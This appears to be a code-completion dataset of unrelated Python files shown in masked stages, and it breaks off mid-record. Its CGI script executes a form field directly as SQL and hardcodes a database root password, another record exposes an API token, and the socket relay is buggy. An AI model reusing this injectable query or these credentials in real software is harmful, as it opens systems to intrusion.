"step-5": "# Greedy Algorithm solves a problem by building a solution incrementally\n# The algorithm is greedy because it chooses the next step that gives the most benefit\n# Can save a lot of time when used correctly since they don't have to look at the entire problem space\n# It's either the most optimal solution or it doesn't work at all, so you have to know for sure when to use it\n# It's a short-sighted algorithm since we are only looking to optimize the input, not the entire solution\n\n# Problem 1 JUMP GAME\n\n# given an array of non-negative integers, we are starting at the first index of the array\n# each element in the array represents our maximum jump length at that position\n# determine if we can reach the last index\n# this stands out as a greedy algorithm\n\n#ex. [2,3,1,1,4]\n# true since we can go from 2 to 3 to 4, or 2 to 1 to 1 to 4\n\nclass Solution:\n #O(n) runtime b/c iterating through array\n #O(1) SC b/c no extra space taken up\n def canJump(self, nums):\n best_index = 0\n # for each index in the array\n for i in range(len(nums)):\n # if the current index is greater than the best index\n if i > best_index:\n return False\n # the best index will become the maximum between the best index and the number at the current index + the current index\n best_index = max(best_index, nums[i] + i)\n return True\n\nif __name__ == \"__main__\":\n ok = Solution()\n ans = ok.canJump([2,3,1,1,4])\n print(ans)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
comms_socket1.bind(('120.79.26.97', 55000))
comms_socket2.bind(('120.79.26.97', 55001))
comms_socket1.listen()
<|reserved_special_token_0|>
comms_socket2.listen()
<|reserved_special_token_0|>
while True:
send_date = user1.recv(4096).decode('UTF-8')
user2.send(bytes(send_data, 'UTF-8'))
send_date = user2.recv(4096).decode('UTF-8')
user1.send(bytes(send_data, 'UTF-8'))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
comms_socket1 = socket.socket()
comms_socket2 = socket.socket()
comms_socket1.bind(('120.79.26.97', 55000))
comms_socket2.bind(('120.79.26.97', 55001))
comms_socket1.listen()
user1, address1 = comms_socket1.accept()
comms_socket2.listen()
user2, address2 = comms_socket2.accept()
while True:
send_date = user1.recv(4096).decode('UTF-8')
user2.send(bytes(send_data, 'UTF-8'))
send_date = user2.recv(4096).decode('UTF-8')
user1.send(bytes(send_data, 'UTF-8'))
<|reserved_special_token_1|>
import socket
comms_socket1 = socket.socket()
comms_socket2 = socket.socket()
comms_socket1.bind(('120.79.26.97', 55000))
comms_socket2.bind(('120.79.26.97', 55001))
comms_socket1.listen()
user1, address1 = comms_socket1.accept()
comms_socket2.listen()
user2, address2 = comms_socket2.accept()
while True:
send_date = user1.recv(4096).decode('UTF-8')
user2.send(bytes(send_data, 'UTF-8'))
send_date = user2.recv(4096).decode('UTF-8')
user1.send(bytes(send_data, 'UTF-8'))
<|reserved_special_token_1|>
import socket
comms_socket1 = socket.socket()
comms_socket2 = socket.socket()
comms_socket1.bind(("120.79.26.97",55000))
comms_socket2.bind(("120.79.26.97",55001))
comms_socket1.listen()
user1,address1 = comms_socket1.accept()
comms_socket2.listen()
user2,address2 = comms_socket2.accept()
while True:
send_date = user1.recv(4096).decode("UTF-8")
user2.send(bytes(send_data,"UTF-8"))
send_date = user2.recv(4096).decode("UTF-8")
user1.send(bytes(send_data,"UTF-8"))
|
flexible
|
{
"blob_id": "8981d53641d22430efb2dd43401fab562b8a95ed",
"index": 3262,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncomms_socket1.bind(('120.79.26.97', 55000))\ncomms_socket2.bind(('120.79.26.97', 55001))\ncomms_socket1.listen()\n<mask token>\ncomms_socket2.listen()\n<mask token>\nwhile True:\n send_date = user1.recv(4096).decode('UTF-8')\n user2.send(bytes(send_data, 'UTF-8'))\n send_date = user2.recv(4096).decode('UTF-8')\n user1.send(bytes(send_data, 'UTF-8'))\n",
"step-3": "<mask token>\ncomms_socket1 = socket.socket()\ncomms_socket2 = socket.socket()\ncomms_socket1.bind(('120.79.26.97', 55000))\ncomms_socket2.bind(('120.79.26.97', 55001))\ncomms_socket1.listen()\nuser1, address1 = comms_socket1.accept()\ncomms_socket2.listen()\nuser2, address2 = comms_socket2.accept()\nwhile True:\n send_date = user1.recv(4096).decode('UTF-8')\n user2.send(bytes(send_data, 'UTF-8'))\n send_date = user2.recv(4096).decode('UTF-8')\n user1.send(bytes(send_data, 'UTF-8'))\n",
"step-4": "import socket\ncomms_socket1 = socket.socket()\ncomms_socket2 = socket.socket()\ncomms_socket1.bind(('120.79.26.97', 55000))\ncomms_socket2.bind(('120.79.26.97', 55001))\ncomms_socket1.listen()\nuser1, address1 = comms_socket1.accept()\ncomms_socket2.listen()\nuser2, address2 = comms_socket2.accept()\nwhile True:\n send_date = user1.recv(4096).decode('UTF-8')\n user2.send(bytes(send_data, 'UTF-8'))\n send_date = user2.recv(4096).decode('UTF-8')\n user1.send(bytes(send_data, 'UTF-8'))\n",
"step-5": "import socket\n\ncomms_socket1 = socket.socket()\ncomms_socket2 = socket.socket()\ncomms_socket1.bind((\"120.79.26.97\",55000))\ncomms_socket2.bind((\"120.79.26.97\",55001))\ncomms_socket1.listen()\nuser1,address1 = comms_socket1.accept()\ncomms_socket2.listen()\nuser2,address2 = comms_socket2.accept()\n\nwhile True:\n send_date = user1.recv(4096).decode(\"UTF-8\")\n user2.send(bytes(send_data,\"UTF-8\"))\n send_date = user2.recv(4096).decode(\"UTF-8\")\n user1.send(bytes(send_data,\"UTF-8\"))\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!C:/Users/Tarang/AppData/Local/Programs/Python/Python37-32/python.exe -u
print("Content-Type: text/html")
print()
import cgi,cgitb
cgitb.enable() #for debugging
form = cgi.FieldStorage()
name = form.getvalue('fname')
print("Name of the user is:",name)
import pymysql
db = pymysql.connect("localhost","root","Manchesterutd20","sts" )
cursor = db.cursor()
cursor.execute(name)
name = cursor.fetchall()
print (name)
db.close()
|
normal
|
{
"blob_id": "cb28e8bb98cbeed0b703fbfcf7cf30ebca52aa25",
"index": 4247,
"step-1": "<mask token>\n",
"step-2": "print('Content-Type: text/html')\nprint()\n<mask token>\ncgitb.enable()\n<mask token>\nprint('Name of the user is:', name)\n<mask token>\ncursor.execute(name)\n<mask token>\nprint(name)\ndb.close()\n",
"step-3": "print('Content-Type: text/html')\nprint()\n<mask token>\ncgitb.enable()\nform = cgi.FieldStorage()\nname = form.getvalue('fname')\nprint('Name of the user is:', name)\n<mask token>\ndb = pymysql.connect('localhost', 'root', 'Manchesterutd20', 'sts')\ncursor = db.cursor()\ncursor.execute(name)\nname = cursor.fetchall()\nprint(name)\ndb.close()\n",
"step-4": "print('Content-Type: text/html')\nprint()\nimport cgi, cgitb\ncgitb.enable()\nform = cgi.FieldStorage()\nname = form.getvalue('fname')\nprint('Name of the user is:', name)\nimport pymysql\ndb = pymysql.connect('localhost', 'root', 'Manchesterutd20', 'sts')\ncursor = db.cursor()\ncursor.execute(name)\nname = cursor.fetchall()\nprint(name)\ndb.close()\n",
"step-5": "#!C:/Users/Tarang/AppData/Local/Programs/Python/Python37-32/python.exe -u\r\nprint(\"Content-Type: text/html\")\r\nprint()\r\n\r\nimport cgi,cgitb\r\ncgitb.enable() #for debugging\r\nform = cgi.FieldStorage()\r\nname = form.getvalue('fname')\r\nprint(\"Name of the user is:\",name)\r\n\r\nimport pymysql\r\n\r\ndb = pymysql.connect(\"localhost\",\"root\",\"Manchesterutd20\",\"sts\" )\r\n\r\ncursor = db.cursor()\r\n\r\ncursor.execute(name)\r\n\r\nname = cursor.fetchall()\r\n\r\nprint (name)\r\n\r\ndb.close()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
""" binary_adder.py: Takes two arrays representing binary numbers,
adds them together. """
__author__ = "David Vaillant"
__credits__ = "CLRS, Chapter 2.1"
def binary_add(x, y):
""" Adds two binary arrays together. """
# Makes sure that the arrays have the same length.
# Could be changed to padding on extra zeroes, if so desired.
assert(len(x) == len(y))
z = [0] * (len(x)+1)
for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):
# Makes sure that the array is a binary array.
# Strictly speaking, not necessary. But nice.
if i not in [0, 1]: return False
if j not in [0, 1]: return False
# if i and j are both 1
if i and j:
z[a] += 0
z[a+1] += 1
# if only one of them is 1
elif i or j:
z[a] += 1
# if they're both 0
else: pass
if z[a] == 2:
z[a+1] += 1
z[a] -= 2
return z[::-1]
def unit_test():
""" Unit tests. """
x_arr = ( [1, 0, 0],
[1],
[0],
[1, 0, 0, 1],
[1, 1, 1, 1],
[1, 0, 0, 0, 0])
y_arr = ( [0, 1, 1],
[0],
[0, 0],
[1, 1, 0, 0],
[0, 0, 0, 0],
[1, 0, 0, 0, 0])
z_arr = ( [0, 1, 1, 1],
[0, 1],
None,
[1, 0, 1, 0, 1],
[0, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0] )
for a, (x, y) in enumerate(zip(x_arr, y_arr)):
sum = binary_add(x, y)
print("Adding {} to {}.".format(x, y))
if sum == z_arr[a]:
print("Successfully returned {}.".format(sum))
else:
print("Got {} instead of {}.".format(sum, z_arr[a]))
print()
if __name__ == "__main__":
unit_test()
|
normal
|
{
"blob_id": "40aa9e7cf0aaca24054297ca80aaf468ba485966",
"index": 5621,
"step-1": "<mask token>\n\n\ndef binary_add(x, y):\n \"\"\" Adds two binary arrays together. \"\"\"\n assert len(x) == len(y)\n z = [0] * (len(x) + 1)\n for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):\n if i not in [0, 1]:\n return False\n if j not in [0, 1]:\n return False\n if i and j:\n z[a] += 0\n z[a + 1] += 1\n elif i or j:\n z[a] += 1\n else:\n pass\n if z[a] == 2:\n z[a + 1] += 1\n z[a] -= 2\n return z[::-1]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef binary_add(x, y):\n \"\"\" Adds two binary arrays together. \"\"\"\n assert len(x) == len(y)\n z = [0] * (len(x) + 1)\n for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):\n if i not in [0, 1]:\n return False\n if j not in [0, 1]:\n return False\n if i and j:\n z[a] += 0\n z[a + 1] += 1\n elif i or j:\n z[a] += 1\n else:\n pass\n if z[a] == 2:\n z[a + 1] += 1\n z[a] -= 2\n return z[::-1]\n\n\ndef unit_test():\n \"\"\" Unit tests. \"\"\"\n x_arr = [1, 0, 0], [1], [0], [1, 0, 0, 1], [1, 1, 1, 1], [1, 0, 0, 0, 0]\n y_arr = [0, 1, 1], [0], [0, 0], [1, 1, 0, 0], [0, 0, 0, 0], [1, 0, 0, 0, 0]\n z_arr = [0, 1, 1, 1], [0, 1], None, [1, 0, 1, 0, 1], [0, 1, 1, 1, 1], [\n 1, 0, 0, 0, 0, 0]\n for a, (x, y) in enumerate(zip(x_arr, y_arr)):\n sum = binary_add(x, y)\n print('Adding {} to {}.'.format(x, y))\n if sum == z_arr[a]:\n print('Successfully returned {}.'.format(sum))\n else:\n print('Got {} instead of {}.'.format(sum, z_arr[a]))\n print()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef binary_add(x, y):\n \"\"\" Adds two binary arrays together. \"\"\"\n assert len(x) == len(y)\n z = [0] * (len(x) + 1)\n for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):\n if i not in [0, 1]:\n return False\n if j not in [0, 1]:\n return False\n if i and j:\n z[a] += 0\n z[a + 1] += 1\n elif i or j:\n z[a] += 1\n else:\n pass\n if z[a] == 2:\n z[a + 1] += 1\n z[a] -= 2\n return z[::-1]\n\n\ndef unit_test():\n \"\"\" Unit tests. \"\"\"\n x_arr = [1, 0, 0], [1], [0], [1, 0, 0, 1], [1, 1, 1, 1], [1, 0, 0, 0, 0]\n y_arr = [0, 1, 1], [0], [0, 0], [1, 1, 0, 0], [0, 0, 0, 0], [1, 0, 0, 0, 0]\n z_arr = [0, 1, 1, 1], [0, 1], None, [1, 0, 1, 0, 1], [0, 1, 1, 1, 1], [\n 1, 0, 0, 0, 0, 0]\n for a, (x, y) in enumerate(zip(x_arr, y_arr)):\n sum = binary_add(x, y)\n print('Adding {} to {}.'.format(x, y))\n if sum == z_arr[a]:\n print('Successfully returned {}.'.format(sum))\n else:\n print('Got {} instead of {}.'.format(sum, z_arr[a]))\n print()\n\n\nif __name__ == '__main__':\n unit_test()\n",
"step-4": "<mask token>\n__author__ = 'David Vaillant'\n__credits__ = 'CLRS, Chapter 2.1'\n\n\ndef binary_add(x, y):\n \"\"\" Adds two binary arrays together. \"\"\"\n assert len(x) == len(y)\n z = [0] * (len(x) + 1)\n for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):\n if i not in [0, 1]:\n return False\n if j not in [0, 1]:\n return False\n if i and j:\n z[a] += 0\n z[a + 1] += 1\n elif i or j:\n z[a] += 1\n else:\n pass\n if z[a] == 2:\n z[a + 1] += 1\n z[a] -= 2\n return z[::-1]\n\n\ndef unit_test():\n \"\"\" Unit tests. \"\"\"\n x_arr = [1, 0, 0], [1], [0], [1, 0, 0, 1], [1, 1, 1, 1], [1, 0, 0, 0, 0]\n y_arr = [0, 1, 1], [0], [0, 0], [1, 1, 0, 0], [0, 0, 0, 0], [1, 0, 0, 0, 0]\n z_arr = [0, 1, 1, 1], [0, 1], None, [1, 0, 1, 0, 1], [0, 1, 1, 1, 1], [\n 1, 0, 0, 0, 0, 0]\n for a, (x, y) in enumerate(zip(x_arr, y_arr)):\n sum = binary_add(x, y)\n print('Adding {} to {}.'.format(x, y))\n if sum == z_arr[a]:\n print('Successfully returned {}.'.format(sum))\n else:\n print('Got {} instead of {}.'.format(sum, z_arr[a]))\n print()\n\n\nif __name__ == '__main__':\n unit_test()\n",
"step-5": "\"\"\" binary_adder.py: Takes two arrays representing binary numbers,\n adds them together. \"\"\"\n\n__author__ = \"David Vaillant\"\n__credits__ = \"CLRS, Chapter 2.1\"\n\ndef binary_add(x, y):\n \"\"\" Adds two binary arrays together. \"\"\"\n # Makes sure that the arrays have the same length.\n # Could be changed to padding on extra zeroes, if so desired.\n assert(len(x) == len(y))\n\n z = [0] * (len(x)+1)\n for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):\n # Makes sure that the array is a binary array.\n # Strictly speaking, not necessary. But nice.\n if i not in [0, 1]: return False\n if j not in [0, 1]: return False\n\n # if i and j are both 1 \n if i and j:\n z[a] += 0\n z[a+1] += 1\n # if only one of them is 1\n elif i or j:\n z[a] += 1\n # if they're both 0\n else: pass\n\n if z[a] == 2:\n z[a+1] += 1\n z[a] -= 2\n \n return z[::-1]\n\ndef unit_test():\n \"\"\" Unit tests. \"\"\"\n x_arr = ( [1, 0, 0],\n [1],\n [0],\n [1, 0, 0, 1],\n [1, 1, 1, 1],\n [1, 0, 0, 0, 0])\n y_arr = ( [0, 1, 1],\n [0],\n [0, 0],\n [1, 1, 0, 0],\n [0, 0, 0, 0],\n [1, 0, 0, 0, 0])\n z_arr = ( [0, 1, 1, 1],\n [0, 1],\n None,\n [1, 0, 1, 0, 1],\n [0, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0] )\n for a, (x, y) in enumerate(zip(x_arr, y_arr)):\n sum = binary_add(x, y)\n print(\"Adding {} to {}.\".format(x, y))\n if sum == z_arr[a]:\n print(\"Successfully returned {}.\".format(sum))\n else:\n print(\"Got {} instead of {}.\".format(sum, z_arr[a]))\n print()\n\nif __name__ == \"__main__\":\n unit_test()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='google-drive-helpers', version='0.1', description=
'Helper functions for google drive', url=
'https://github.com/jdoepfert/google-drive-helpers', license='MIT',
packages=['gdrive_helpers'], install_requires=[
'google-api-python-client'], zip_safe=False)
<|reserved_special_token_1|>
from setuptools import setup
setup(name='google-drive-helpers', version='0.1', description=
'Helper functions for google drive', url=
'https://github.com/jdoepfert/google-drive-helpers', license='MIT',
packages=['gdrive_helpers'], install_requires=[
'google-api-python-client'], zip_safe=False)
<|reserved_special_token_1|>
from setuptools import setup
setup(name='google-drive-helpers',
version='0.1',
description='Helper functions for google drive',
url='https://github.com/jdoepfert/google-drive-helpers',
license='MIT',
packages=['gdrive_helpers'],
install_requires=[
'google-api-python-client',
],
zip_safe=False)
|
flexible
|
{
"blob_id": "c0218acadb9e03359ac898cf3bb4898f516400e5",
"index": 5361,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='google-drive-helpers', version='0.1', description=\n 'Helper functions for google drive', url=\n 'https://github.com/jdoepfert/google-drive-helpers', license='MIT',\n packages=['gdrive_helpers'], install_requires=[\n 'google-api-python-client'], zip_safe=False)\n",
"step-3": "from setuptools import setup\nsetup(name='google-drive-helpers', version='0.1', description=\n 'Helper functions for google drive', url=\n 'https://github.com/jdoepfert/google-drive-helpers', license='MIT',\n packages=['gdrive_helpers'], install_requires=[\n 'google-api-python-client'], zip_safe=False)\n",
"step-4": "from setuptools import setup\n\nsetup(name='google-drive-helpers',\n version='0.1',\n description='Helper functions for google drive',\n url='https://github.com/jdoepfert/google-drive-helpers',\n license='MIT',\n packages=['gdrive_helpers'],\n install_requires=[\n 'google-api-python-client',\n ],\n zip_safe=False)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
IEX_CLOUD_API_TOKEN = 'Tpk_5d9dc536610243cda2c8ef4787d729b6'
|
flexible
|
{
"blob_id": "86849d0e63cdb93a16497ca56ff9c64c15a60fa7",
"index": 4891,
"step-1": "<mask token>\n",
"step-2": "IEX_CLOUD_API_TOKEN = 'Tpk_5d9dc536610243cda2c8ef4787d729b6'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
def test_fancy_exception_base():
exc = _FancyExceptionBase('message')
assert str(exc) == 'message'
exc = _FancyExceptionBase(message='message')
assert str(exc) == 'message'
cause = Exception('cause')
exc = _FancyExceptionBase('message')
exc.__cause__ = cause
pickled_exc = pickle.dumps(exc)
assert str(exc) == 'message: builtins.Exception: cause'
assert str(exc) == str(pickle.loads(pickled_exc))
class WithURL(_FancyExceptionBase):
message = 'default message'
def __init__(self, url, **kwargs):
super().__init__(**kwargs)
self.url = url
@property
def _str(self):
return self.url.upper()
exc = WithURL('url')
assert str(exc) == 'default message: URL'
exc = WithURL('url', message='another message')
exc.__cause__ = cause
assert str(exc) == 'another message: URL: builtins.Exception: cause'
def _all_classes(cls):
yield cls
for subclass in cls.__subclasses__():
yield from _all_classes(subclass)
<|reserved_special_token_0|>
@pytest.mark.parametrize('exc_type', all_classes(FeedError))
def test_feed_error_str(exc_type):
exc = exc_type('url')
assert repr('url') in str(exc)
<|reserved_special_token_0|>
@pytest.mark.parametrize('exc_type', all_classes(TagError))
def test_tag_error_str(exc_type):
exc = exc_type(('object',), 'key')
assert "'object': 'key'" in str(exc)
@pytest.mark.parametrize('args, expected', [(('before_feeds_update',
'myhook'), "unexpected hook error: before_feeds_update: 'myhook'"), ((
'before_feeds_update', 'myhook', ()),
"unexpected hook error: before_feeds_update: 'myhook': ()"), ((
'before_feed_update', 'myhook', ('feed',)),
"unexpected hook error: before_feed_update: 'myhook': 'feed'"), ((
'after_entry_update', 'myhook', ('feed', 'entry')),
"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')")])
def test_single_update_hook_error_str(args, expected):
exc = SingleUpdateHookError(*args)
assert str(exc) == expected
exc = SingleUpdateHookError(*args)
exc.__cause__ = Exception('cause')
assert str(exc) == expected + ': builtins.Exception: cause'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_fancy_exception_base():
exc = _FancyExceptionBase('message')
assert str(exc) == 'message'
exc = _FancyExceptionBase(message='message')
assert str(exc) == 'message'
cause = Exception('cause')
exc = _FancyExceptionBase('message')
exc.__cause__ = cause
pickled_exc = pickle.dumps(exc)
assert str(exc) == 'message: builtins.Exception: cause'
assert str(exc) == str(pickle.loads(pickled_exc))
class WithURL(_FancyExceptionBase):
message = 'default message'
def __init__(self, url, **kwargs):
super().__init__(**kwargs)
self.url = url
@property
def _str(self):
return self.url.upper()
exc = WithURL('url')
assert str(exc) == 'default message: URL'
exc = WithURL('url', message='another message')
exc.__cause__ = cause
assert str(exc) == 'another message: URL: builtins.Exception: cause'
def _all_classes(cls):
yield cls
for subclass in cls.__subclasses__():
yield from _all_classes(subclass)
def all_classes(*args, **kwargs):
return list(_all_classes(*args, **kwargs))
@pytest.mark.parametrize('exc_type', all_classes(FeedError))
def test_feed_error_str(exc_type):
exc = exc_type('url')
assert repr('url') in str(exc)
<|reserved_special_token_0|>
@pytest.mark.parametrize('exc_type', all_classes(TagError))
def test_tag_error_str(exc_type):
exc = exc_type(('object',), 'key')
assert "'object': 'key'" in str(exc)
@pytest.mark.parametrize('args, expected', [(('before_feeds_update',
'myhook'), "unexpected hook error: before_feeds_update: 'myhook'"), ((
'before_feeds_update', 'myhook', ()),
"unexpected hook error: before_feeds_update: 'myhook': ()"), ((
'before_feed_update', 'myhook', ('feed',)),
"unexpected hook error: before_feed_update: 'myhook': 'feed'"), ((
'after_entry_update', 'myhook', ('feed', 'entry')),
"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')")])
def test_single_update_hook_error_str(args, expected):
exc = SingleUpdateHookError(*args)
assert str(exc) == expected
exc = SingleUpdateHookError(*args)
exc.__cause__ = Exception('cause')
assert str(exc) == expected + ': builtins.Exception: cause'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_fancy_exception_base():
exc = _FancyExceptionBase('message')
assert str(exc) == 'message'
exc = _FancyExceptionBase(message='message')
assert str(exc) == 'message'
cause = Exception('cause')
exc = _FancyExceptionBase('message')
exc.__cause__ = cause
pickled_exc = pickle.dumps(exc)
assert str(exc) == 'message: builtins.Exception: cause'
assert str(exc) == str(pickle.loads(pickled_exc))
class WithURL(_FancyExceptionBase):
message = 'default message'
def __init__(self, url, **kwargs):
super().__init__(**kwargs)
self.url = url
@property
def _str(self):
return self.url.upper()
exc = WithURL('url')
assert str(exc) == 'default message: URL'
exc = WithURL('url', message='another message')
exc.__cause__ = cause
assert str(exc) == 'another message: URL: builtins.Exception: cause'
def _all_classes(cls):
yield cls
for subclass in cls.__subclasses__():
yield from _all_classes(subclass)
def all_classes(*args, **kwargs):
return list(_all_classes(*args, **kwargs))
@pytest.mark.parametrize('exc_type', all_classes(FeedError))
def test_feed_error_str(exc_type):
exc = exc_type('url')
assert repr('url') in str(exc)
@pytest.mark.parametrize('exc_type', all_classes(EntryError))
def test_entry_error_str(exc_type):
exc = exc_type('url', 'id')
assert repr(('url', 'id')) in str(exc)
@pytest.mark.parametrize('exc_type', all_classes(TagError))
def test_tag_error_str(exc_type):
exc = exc_type(('object',), 'key')
assert "'object': 'key'" in str(exc)
@pytest.mark.parametrize('args, expected', [(('before_feeds_update',
'myhook'), "unexpected hook error: before_feeds_update: 'myhook'"), ((
'before_feeds_update', 'myhook', ()),
"unexpected hook error: before_feeds_update: 'myhook': ()"), ((
'before_feed_update', 'myhook', ('feed',)),
"unexpected hook error: before_feed_update: 'myhook': 'feed'"), ((
'after_entry_update', 'myhook', ('feed', 'entry')),
"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')")])
def test_single_update_hook_error_str(args, expected):
exc = SingleUpdateHookError(*args)
assert str(exc) == expected
exc = SingleUpdateHookError(*args)
exc.__cause__ = Exception('cause')
assert str(exc) == expected + ': builtins.Exception: cause'
<|reserved_special_token_1|>
import pickle
import pytest
from reader import EntryError
from reader import FeedError
from reader import SingleUpdateHookError
from reader import TagError
from reader.exceptions import _FancyExceptionBase
def test_fancy_exception_base():
exc = _FancyExceptionBase('message')
assert str(exc) == 'message'
exc = _FancyExceptionBase(message='message')
assert str(exc) == 'message'
cause = Exception('cause')
exc = _FancyExceptionBase('message')
exc.__cause__ = cause
pickled_exc = pickle.dumps(exc)
assert str(exc) == 'message: builtins.Exception: cause'
assert str(exc) == str(pickle.loads(pickled_exc))
class WithURL(_FancyExceptionBase):
message = 'default message'
def __init__(self, url, **kwargs):
super().__init__(**kwargs)
self.url = url
@property
def _str(self):
return self.url.upper()
exc = WithURL('url')
assert str(exc) == 'default message: URL'
exc = WithURL('url', message='another message')
exc.__cause__ = cause
assert str(exc) == 'another message: URL: builtins.Exception: cause'
def _all_classes(cls):
yield cls
for subclass in cls.__subclasses__():
yield from _all_classes(subclass)
def all_classes(*args, **kwargs):
return list(_all_classes(*args, **kwargs))
@pytest.mark.parametrize('exc_type', all_classes(FeedError))
def test_feed_error_str(exc_type):
exc = exc_type('url')
assert repr('url') in str(exc)
@pytest.mark.parametrize('exc_type', all_classes(EntryError))
def test_entry_error_str(exc_type):
exc = exc_type('url', 'id')
assert repr(('url', 'id')) in str(exc)
@pytest.mark.parametrize('exc_type', all_classes(TagError))
def test_tag_error_str(exc_type):
exc = exc_type(('object',), 'key')
assert "'object': 'key'" in str(exc)
@pytest.mark.parametrize('args, expected', [(('before_feeds_update',
'myhook'), "unexpected hook error: before_feeds_update: 'myhook'"), ((
'before_feeds_update', 'myhook', ()),
"unexpected hook error: before_feeds_update: 'myhook': ()"), ((
'before_feed_update', 'myhook', ('feed',)),
"unexpected hook error: before_feed_update: 'myhook': 'feed'"), ((
'after_entry_update', 'myhook', ('feed', 'entry')),
"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')")])
def test_single_update_hook_error_str(args, expected):
exc = SingleUpdateHookError(*args)
assert str(exc) == expected
exc = SingleUpdateHookError(*args)
exc.__cause__ = Exception('cause')
assert str(exc) == expected + ': builtins.Exception: cause'
<|reserved_special_token_1|>
import pickle
import pytest
from reader import EntryError
from reader import FeedError
from reader import SingleUpdateHookError
from reader import TagError
from reader.exceptions import _FancyExceptionBase
def test_fancy_exception_base():
exc = _FancyExceptionBase('message')
assert str(exc) == 'message'
exc = _FancyExceptionBase(message='message')
assert str(exc) == 'message'
cause = Exception('cause')
exc = _FancyExceptionBase('message')
exc.__cause__ = cause
pickled_exc = pickle.dumps(exc)
assert str(exc) == 'message: builtins.Exception: cause'
assert str(exc) == str(pickle.loads(pickled_exc))
class WithURL(_FancyExceptionBase):
message = 'default message'
def __init__(self, url, **kwargs):
super().__init__(**kwargs)
self.url = url
@property
def _str(self):
return self.url.upper()
exc = WithURL('url')
assert str(exc) == 'default message: URL'
exc = WithURL('url', message='another message')
exc.__cause__ = cause
assert str(exc) == 'another message: URL: builtins.Exception: cause'
def _all_classes(cls):
yield cls
for subclass in cls.__subclasses__():
yield from _all_classes(subclass)
def all_classes(*args, **kwargs):
return list(_all_classes(*args, **kwargs))
@pytest.mark.parametrize('exc_type', all_classes(FeedError))
def test_feed_error_str(exc_type):
exc = exc_type('url')
assert repr('url') in str(exc)
@pytest.mark.parametrize('exc_type', all_classes(EntryError))
def test_entry_error_str(exc_type):
exc = exc_type('url', 'id')
assert repr(('url', 'id')) in str(exc)
@pytest.mark.parametrize('exc_type', all_classes(TagError))
def test_tag_error_str(exc_type):
exc = exc_type(('object',), 'key')
assert "'object': 'key'" in str(exc)
@pytest.mark.parametrize(
'args, expected',
[
(
('before_feeds_update', 'myhook'),
"unexpected hook error: before_feeds_update: 'myhook'",
),
(
('before_feeds_update', 'myhook', ()),
"unexpected hook error: before_feeds_update: 'myhook': ()",
),
(
('before_feed_update', 'myhook', ('feed',)),
"unexpected hook error: before_feed_update: 'myhook': 'feed'",
),
(
('after_entry_update', 'myhook', ('feed', 'entry')),
"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')",
),
],
)
def test_single_update_hook_error_str(args, expected):
exc = SingleUpdateHookError(*args)
assert str(exc) == expected
exc = SingleUpdateHookError(*args)
exc.__cause__ = Exception('cause')
assert str(exc) == expected + ": builtins.Exception: cause"
|
flexible
|
{
"blob_id": "6fd4df7370de2343fe7723a2d8f5aacffa333835",
"index": 3105,
"step-1": "<mask token>\n\n\ndef test_fancy_exception_base():\n exc = _FancyExceptionBase('message')\n assert str(exc) == 'message'\n exc = _FancyExceptionBase(message='message')\n assert str(exc) == 'message'\n cause = Exception('cause')\n exc = _FancyExceptionBase('message')\n exc.__cause__ = cause\n pickled_exc = pickle.dumps(exc)\n assert str(exc) == 'message: builtins.Exception: cause'\n assert str(exc) == str(pickle.loads(pickled_exc))\n\n\n class WithURL(_FancyExceptionBase):\n message = 'default message'\n\n def __init__(self, url, **kwargs):\n super().__init__(**kwargs)\n self.url = url\n\n @property\n def _str(self):\n return self.url.upper()\n exc = WithURL('url')\n assert str(exc) == 'default message: URL'\n exc = WithURL('url', message='another message')\n exc.__cause__ = cause\n assert str(exc) == 'another message: URL: builtins.Exception: cause'\n\n\ndef _all_classes(cls):\n yield cls\n for subclass in cls.__subclasses__():\n yield from _all_classes(subclass)\n\n\n<mask token>\n\n\[email protected]('exc_type', all_classes(FeedError))\ndef test_feed_error_str(exc_type):\n exc = exc_type('url')\n assert repr('url') in str(exc)\n\n\n<mask token>\n\n\[email protected]('exc_type', all_classes(TagError))\ndef test_tag_error_str(exc_type):\n exc = exc_type(('object',), 'key')\n assert \"'object': 'key'\" in str(exc)\n\n\[email protected]('args, expected', [(('before_feeds_update',\n 'myhook'), \"unexpected hook error: before_feeds_update: 'myhook'\"), ((\n 'before_feeds_update', 'myhook', ()),\n \"unexpected hook error: before_feeds_update: 'myhook': ()\"), ((\n 'before_feed_update', 'myhook', ('feed',)),\n \"unexpected hook error: before_feed_update: 'myhook': 'feed'\"), ((\n 'after_entry_update', 'myhook', ('feed', 'entry')),\n \"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')\")])\ndef test_single_update_hook_error_str(args, expected):\n exc = SingleUpdateHookError(*args)\n assert str(exc) == expected\n exc = 